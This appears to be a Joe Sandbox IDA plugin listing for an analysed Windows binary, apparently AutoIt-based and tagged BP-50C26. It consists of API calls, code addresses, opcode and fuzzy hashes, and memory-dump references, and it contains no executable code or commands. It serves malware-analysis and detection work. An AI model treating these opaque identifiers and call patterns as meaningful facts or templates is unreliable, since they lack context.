                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                                                      • String ID: 0
                                                                                      • API String ID: 1227352736-4108050209
                                                                                      • Opcode ID: 0cfd46f8156acd532d6fd6c974c192a82309c197b6c5c240bed15b607e7bc5a6
                                                                                      • Instruction ID: 8f7e2fbbbc95839fb9609261427835f5d0f13e08b286aa437e51fe39382d3b9b
                                                                                      • Opcode Fuzzy Hash: 0cfd46f8156acd532d6fd6c974c192a82309c197b6c5c240bed15b607e7bc5a6
                                                                                      • Instruction Fuzzy Hash: 1751E0716043029BD7189F29C8C5B6B77E8AF49310F048A2DF9A9D31E0DB70DA44DB52
                                                                                      APIs
                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00C9AEA3
                                                                                        • Part of subcall function 00C17620: _wcslen.LIBCMT ref: 00C17625
                                                                                      • GetProcessId.KERNEL32(00000000), ref: 00C9AF38
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C9AF67
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                      • String ID: <$@
                                                                                      • API String ID: 146682121-1426351568
                                                                                      • Opcode ID: c9255c8dd3164918149ef7e820226113e250b1135058d0f561f8019d90c031a2
                                                                                      • Instruction ID: ce82d40013ed6299231c3e67edfd3d5aef691ff28be89dfea2edf210534ab247
                                                                                      • Opcode Fuzzy Hash: c9255c8dd3164918149ef7e820226113e250b1135058d0f561f8019d90c031a2
                                                                                      • Instruction Fuzzy Hash: F9713871A00219DFCF14DF94C488A9EBBF1EF09314F048499E816AB762CB75EE85DB91
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C77206
                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C7723C
                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C7724D
                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C772CF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                      • String ID: DllGetClassObject
                                                                                      • API String ID: 753597075-1075368562
                                                                                      • Opcode ID: da6130c0734fe0a5f8ac12bd44f513c1870dad31bbde2ac1b06d8e225452f560
                                                                                      • Instruction ID: 506bcb1d31aa68f733fe41f21b06f41c1d7810e488537d68825b2059f5e48b3e
                                                                                      • Opcode Fuzzy Hash: da6130c0734fe0a5f8ac12bd44f513c1870dad31bbde2ac1b06d8e225452f560
                                                                                      • Instruction Fuzzy Hash: E6418DB1A04208EFDB15CF54C885B9A7BA9EF45314F15C1A9BD19DF20AD7B0DA40DBA0
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA3E35
                                                                                      • IsMenu.USER32(?), ref: 00CA3E4A
                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CA3E92
                                                                                      • DrawMenuBar.USER32 ref: 00CA3EA5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                      • String ID: 0
                                                                                      • API String ID: 3076010158-4108050209
                                                                                      • Opcode ID: 5fbdc4104f6fcf804c9f3c088e9fa71dcc12b050afb0a20e43081ba738e865c3
                                                                                      • Instruction ID: 23194faa5fed38004303c81a012b35da43568c2b3ba4519e145302458d167ca2
                                                                                      • Opcode Fuzzy Hash: 5fbdc4104f6fcf804c9f3c088e9fa71dcc12b050afb0a20e43081ba738e865c3
                                                                                      • Instruction Fuzzy Hash: 1A416A75A0124AEFDB10DF50D894AEABBB9FF4A358F04402AF9159B250D730AE50DF50
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C73CCA
                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C71E66
                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C71E79
                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C71EA9
                                                                                        • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 2081771294-1403004172
                                                                                      • Opcode ID: ed6268eb9aa062be82310d022327cd3b3b5cd921fd3d36c4283db7d327e6e824
                                                                                      • Instruction ID: 6089c48f3480e92414ed47c4ac14e59eaaa25bb9abe136cf502278b81864b2f3
                                                                                      • Opcode Fuzzy Hash: ed6268eb9aa062be82310d022327cd3b3b5cd921fd3d36c4283db7d327e6e824
                                                                                      • Instruction Fuzzy Hash: FC214971A00104BFDB149BA8DC5ADFFB7B8DF42354B148129FC69A31E0DB344A45A620
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CA2F8D
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00CA2F94
                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CA2FA9
                                                                                      • DestroyWindow.USER32(?), ref: 00CA2FB1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                      • String ID: SysAnimate32
                                                                                      • API String ID: 3529120543-1011021900
                                                                                      • Opcode ID: 40f48bdcd1ab299f82e19f6da973b4ab93f115a41ce50ebba2adc8959178754d
                                                                                      • Instruction ID: 3ab828185e22be473cb1bbfb5e094ee1c93a50b0473ede383bc50503a77c7d07
                                                                                      • Opcode Fuzzy Hash: 40f48bdcd1ab299f82e19f6da973b4ab93f115a41ce50ebba2adc8959178754d
                                                                                      • Instruction Fuzzy Hash: 8F218E71204226AFEB104FA8DC80FBB77B9EB5A36CF104619F960D6190D771DD91A760
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C34D1E,00C428E9,?,00C34CBE,00C428E9,00CD88B8,0000000C,00C34E15,00C428E9,00000002), ref: 00C34D8D
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C34DA0
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00C34D1E,00C428E9,?,00C34CBE,00C428E9,00CD88B8,0000000C,00C34E15,00C428E9,00000002,00000000), ref: 00C34DC3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045

APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C14EDD,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14E9C
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C14EAE
• FreeLibrary.KERNEL32(00000000,?,?,00C14EDD,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14EC0
Strings
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502

APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C53CDE,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14E62
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C14E74
• FreeLibrary.KERNEL32(00000000,?,?,00C53CDE,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14E87
Strings
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 145871493-1355242751

APIs
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C82C05
• DeleteFileW.KERNEL32(?), ref: 00C82C87
• CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C82C9D
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C82CAE
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C82CC0
Similarity
• API ID: File$Delete$Copy
• String ID:
• API String ID: 3226157194-0

APIs
• GetCurrentProcessId.KERNEL32 ref: 00C9A427
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C9A435
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C9A468
• CloseHandle.KERNEL32(?), ref: 00C9A63D
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0

APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00CB3700), ref: 00C4BB91
• WideCharToMultiByte.KERNEL32(00000000,00000000,00CE121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00C4BC09
• WideCharToMultiByte.KERNEL32(00000000,00000000,00CE1270,000000FF,?,0000003F,00000000,?), ref: 00C4BC36
• _free.LIBCMT ref: 00C4BB7F
  • Part of subcall function 00C429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000), ref: 00C429DE
  • Part of subcall function 00C429C8: GetLastError.KERNEL32(00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000,00000000), ref: 00C429F0
• _free.LIBCMT ref: 00C4BD4B
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 1286116820-0

APIs
  • Part of subcall function 00C7DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C7CF22,?), ref: 00C7DDFD
  • Part of subcall function 00C7DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C7CF22,?), ref: 00C7DE16
  • Part of subcall function 00C7E199: GetFileAttributesW.KERNEL32(?,00C7CF95), ref: 00C7E19A
• lstrcmpiW.KERNEL32(?,?), ref: 00C7E473
• MoveFileW.KERNEL32(?,?), ref: 00C7E4AC
• _wcslen.LIBCMT ref: 00C7E5EB
• _wcslen.LIBCMT ref: 00C7E603
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00C7E650
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0

APIs
  • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
  • Part of subcall function 00C9C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C9B6AE,?,?), ref: 00C9C9B5
  • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9C9F1
  • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9CA68
  • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9CA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9BAA5
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C9BB00
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C9BB63
• RegCloseKey.ADVAPI32(?,?), ref: 00C9BBA6
• RegCloseKey.ADVAPI32(00000000), ref: 00C9BBB3
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0

APIs
• VariantInit.OLEAUT32(?), ref: 00C78BCD
• VariantClear.OLEAUT32 ref: 00C78C3E
• VariantClear.OLEAUT32 ref: 00C78C9D
• VariantClear.OLEAUT32(?), ref: 00C78D10
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C78D3B
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C88BAE
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00C88BDA
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C88C32
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C88C57
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C88C5F
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 00C98F40
• GetProcAddress.KERNEL32(00000000,?), ref: 00C98FD0
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00C98FEC
• GetProcAddress.KERNEL32(00000000,?), ref: 00C99032
• FreeLibrary.KERNEL32(00000000), ref: 00C99052
  • Part of subcall function 00C2F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00C81043,?,7529E610), ref: 00C2F6E6
  • Part of subcall function 00C2F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00C6FA64,00000000,00000000,?,?,00C81043,?,7529E610,?,00C6FA64), ref: 00C2F70D
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
• String ID:
• API String ID: 666041331-0
APIs
• SetWindowLongW.USER32(00000002,000000F0,?), ref: 00CA6C33
• SetWindowLongW.USER32(?,000000EC,?), ref: 00CA6C4A
• SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00CA6C73
• ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C8AB79,00000000,00000000), ref: 00CA6C98
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00CA6CC7
Similarity
• API ID: Window$Long$MessageSendShow
• String ID:
• API String ID: 3688381893-0
APIs
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• GetCursorPos.USER32(?), ref: 00C29141
• ScreenToClient.USER32(00000000,?), ref: 00C2915E
• GetAsyncKeyState.USER32(00000001), ref: 00C29183
• GetAsyncKeyState.USER32(00000002), ref: 00C2919D
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
APIs
• GetInputState.USER32 ref: 00C838CB
• TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C83922
• TranslateMessage.USER32(?), ref: 00C8394B
• DispatchMessageW.USER32(?), ref: 00C83955
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C83966
Similarity
• API ID: Message$Translate$AcceleratorDispatchInputPeekState
• String ID:
• API String ID: 2256411358-0
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00C8C21E,00000000), ref: 00C8CF38
• InternetReadFile.WININET(?,00000000,?,?), ref: 00C8CF6F
• GetLastError.KERNEL32(?,00000000,?,?,?,00C8C21E,00000000), ref: 00C8CFB4
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00C8C21E,00000000), ref: 00C8CFC8
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00C8C21E,00000000), ref: 00C8CFF2
Similarity
• API ID: EventInternet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 3191363074-0
APIs
• GetWindowRect.USER32(?,?), ref: 00C71915
• PostMessageW.USER32(00000001,00000201,00000001), ref: 00C719C1
• Sleep.KERNEL32(00000000,?,?,?), ref: 00C719C9
• PostMessageW.USER32(00000001,00000202,00000000), ref: 00C719DA
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C719E2
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
APIs
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00CA5745
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00CA579D
• _wcslen.LIBCMT ref: 00CA57AF
• _wcslen.LIBCMT ref: 00CA57BA
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00CA5816
Similarity
• API ID: MessageSend$_wcslen
• String ID:
• API String ID: 763830540-0
APIs
• IsWindow.USER32(00000000), ref: 00C90951
• GetForegroundWindow.USER32 ref: 00C90968
• GetDC.USER32(00000000), ref: 00C909A4
• GetPixel.GDI32(00000000,?,00000003), ref: 00C909B0
• ReleaseDC.USER32(00000000,00000003), ref: 00C909E8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                      • String ID:
                                                                                      • API String ID: 4156661090-0
                                                                                      • Opcode ID: c889d8587108f8c8bf25e82b7d7483836d405551573d10763aac045e565591c5
                                                                                      • Instruction ID: 32764b1aac556f408b76e7b936cd15e67fc6c2f11114647279d8e99f7a77e991
                                                                                      • Opcode Fuzzy Hash: c889d8587108f8c8bf25e82b7d7483836d405551573d10763aac045e565591c5
                                                                                      • Instruction Fuzzy Hash: 3F219335600204AFD704EF65C988BAEBBF9EF45704F148468F85AE7352DB30AD45DB50
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00C4CDC6
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C4CDE9
                                                                                        • Part of subcall function 00C43820: RtlAllocateHeap.NTDLL(00000000,?,00CE1444,?,00C2FDF5,?,?,00C1A976,00000010,00CE1440,00C113FC,?,00C113C6,?,00C11129), ref: 00C43852
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C4CE0F
                                                                                      • _free.LIBCMT ref: 00C4CE22
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C4CE31
                                                                                      Similarity
                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                      • String ID:
                                                                                      • API String ID: 336800556-0
                                                                                      • Opcode ID: 1e6ff1423602e380e88ed5c00ce5724682d78a10909c2c8163d4757b70054281
                                                                                      • Instruction ID: ea07bd886d0eb9c83850cf7348a92847241fb4684646f49fc5c6d31d89eccc87
                                                                                      • Opcode Fuzzy Hash: 1e6ff1423602e380e88ed5c00ce5724682d78a10909c2c8163d4757b70054281
                                                                                      • Instruction Fuzzy Hash: 280184726032157F276116B76CC8E7F696DFFC7BA53150129F915C7221EF618E0291B0
                                                                                      APIs
                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C29693
                                                                                      • SelectObject.GDI32(?,00000000), ref: 00C296A2
                                                                                      • BeginPath.GDI32(?), ref: 00C296B9
                                                                                      • SelectObject.GDI32(?,00000000), ref: 00C296E2
                                                                                      Similarity
                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                      • String ID:
                                                                                      • API String ID: 3225163088-0
                                                                                      • Opcode ID: f0f4e052ee40dca24412d6271d2ef15ca748077e77ae760ca1d974bcc11c6989
                                                                                      • Instruction ID: 5f6ac1c31ca30080bd953acf03588565ba5599bb8a7b5e2c625e2bcd9aed6b95
                                                                                      • Opcode Fuzzy Hash: f0f4e052ee40dca24412d6271d2ef15ca748077e77ae760ca1d974bcc11c6989
                                                                                      • Instruction Fuzzy Hash: 3A218030802355EBDB119F25FC88BAD3BB8FB01315F140216F820AB1B2D37499A1CF90
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: _memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 2931989736-0
                                                                                      • Opcode ID: b37fcbc03c6e163636846b32fa46487886925fcfa423922f9029b60c270bfd1c
                                                                                      • Instruction ID: 5f1365d5740565f059f276c94699a8967c8861ecb13e1517458d30e1feccc306
                                                                                      • Opcode Fuzzy Hash: b37fcbc03c6e163636846b32fa46487886925fcfa423922f9029b60c270bfd1c
                                                                                      • Instruction Fuzzy Hash: BC01B5A166160ABFE21C55529D82FBB735C9B213A8F048034FD1C9A241F7B1EE5196B0
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,?,00C3F2DE,00C43863,00CE1444,?,00C2FDF5,?,?,00C1A976,00000010,00CE1440,00C113FC,?,00C113C6), ref: 00C42DFD
                                                                                      • _free.LIBCMT ref: 00C42E32
                                                                                      • _free.LIBCMT ref: 00C42E59
                                                                                      • SetLastError.KERNEL32(00000000,00C11129), ref: 00C42E66
                                                                                      • SetLastError.KERNEL32(00000000,00C11129), ref: 00C42E6F
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free
                                                                                      • String ID:
                                                                                      • API String ID: 3170660625-0
                                                                                      • Opcode ID: 58c2cb26508208c079a4a47db4a4cefc18bbb548c7fc324c0c9864c6584d7da8
                                                                                      • Instruction ID: adda5209417a560a065c70c62d2a5d01e01a3adf73e292cc56b86b5f37624545
                                                                                      • Opcode Fuzzy Hash: 58c2cb26508208c079a4a47db4a4cefc18bbb548c7fc324c0c9864c6584d7da8
                                                                                      • Instruction Fuzzy Hash: FA01F43260660167CA1267366C87F6F2669BBD23A6BE40029F431E32A3EF74CD01A120
                                                                                      APIs
                                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?,?,?,00C7035E), ref: 00C7002B
                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?,?), ref: 00C70046
                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?,?), ref: 00C70054
                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?), ref: 00C70064
                                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?,?), ref: 00C70070
                                                                                      Similarity
                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 3897988419-0
                                                                                      • Opcode ID: ee660adf0c313c44579a228422833e6a8b96572f4007c1e6c2da50107195b175
                                                                                      • Instruction ID: 14162b03d2dc074b54f4ff1eb9af76beef692ffff95eb12ac3eb8bce7b676739
                                                                                      • Opcode Fuzzy Hash: ee660adf0c313c44579a228422833e6a8b96572f4007c1e6c2da50107195b175
                                                                                      • Instruction Fuzzy Hash: 0F018F72600204FFDB104F69DC48BAE7BEDEB44766F248124F909D3210D779DE409BA0
                                                                                      APIs
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00C7E997
                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00C7E9A5
                                                                                      • Sleep.KERNEL32(00000000), ref: 00C7E9AD
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00C7E9B7
                                                                                      • Sleep.KERNEL32 ref: 00C7E9F3
                                                                                      Similarity
                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                      • String ID:
                                                                                      • API String ID: 2833360925-0
                                                                                      • Opcode ID: 829d73f68c671ae9f6c23f989a63d9913a920420df60f085f44ec2929094de10
                                                                                      • Instruction ID: 4e18c7f28a7ef5cdf624d1fe8092a59fed739ee978d7bf2840c80478ca3c481b
                                                                                      • Opcode Fuzzy Hash: 829d73f68c671ae9f6c23f989a63d9913a920420df60f085f44ec2929094de10
